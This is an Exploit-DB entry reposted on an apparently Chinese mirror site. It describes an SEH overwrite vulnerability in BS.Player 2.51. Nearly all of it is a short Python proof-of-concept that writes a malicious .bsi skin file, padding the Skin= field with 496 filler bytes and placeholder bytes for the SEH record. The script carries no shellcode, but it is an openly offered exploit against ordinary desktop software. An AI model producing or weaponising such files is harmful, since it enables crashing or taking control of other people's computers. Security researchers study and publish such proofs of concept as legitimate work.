BS.Player 2.51 – Overwrite (SEH)

  • 作者: Mert SARICA
    日期: 2010-01-15
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11146/
  • # BS.Player v2.51
    # Software Link: http://www.bsplayer.com/bsplayer-english/download-free.html
    # SEH Overwrite Vulnerability
    # http://www.mertsarica.com
    
    junk = "[Options]\nSkin="
    
    vulnerability = junk + "\x41"*496 + "\x42"*4 + "\x43"*4
    
    try: 
     vulnerable = open("vulnerable.bsi",'w') 
     vulnerable.write(vulnerability) 
     vulnerable.close() 
     print "Vulnerable file created!\n"
    except: 
     print "Error occured!"